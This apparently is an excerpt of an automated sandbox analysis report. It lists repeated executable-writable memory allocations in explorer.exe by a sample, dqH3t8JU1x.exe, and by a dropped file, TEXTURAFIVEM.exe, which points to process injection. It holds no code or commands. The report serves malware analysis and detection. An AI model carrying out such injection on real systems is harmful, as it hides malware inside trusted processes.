            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: AEC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: AE60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: AE90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: AED0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: AF00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: B0A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: B0F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\explorer.exe base: B120000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 24080000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3330000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3340000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3350000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 33E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 33F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3600000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3610000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3620000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3630000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3640000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3650000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3660000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3670000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3680000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3690000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B40000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3BA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3BC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3BD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3BE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3BF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3C00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3C10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3C20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 53E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 53F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5410000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5450000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5460000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5470000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5480000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5490000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5500000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5510000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5600000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5610000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5700000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5710000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5800000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5810000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5900000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5910000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5A00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5A10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5B00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5B10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5BA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5BB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5BC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5BD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5BE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5BF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5C00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5C10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5CA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5CB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5CC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5CD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5CE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5CF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5D00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5D10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5DA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5DB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5DC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5DD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5DE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5DF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5E00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5E10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5EA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5EB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5EC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5ED0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5EE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5EF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5F00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5F10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 24010000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: CB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: CC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: CD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: D60000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: D70000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: D80000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: D90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: DA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: DB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: DC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: DD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: DE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: DF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: E00000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: E10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3370000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4DB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4DC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4DD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4DE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4DF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E00000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E20000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E30000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E40000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E50000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E60000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E70000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E80000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4E90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4EA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4EB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4EC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4ED0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4EF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4F00000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4F40000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4F50000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4F60000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4F70000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4F80000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4F90000 protect: page execute and read and writeJump to behavior
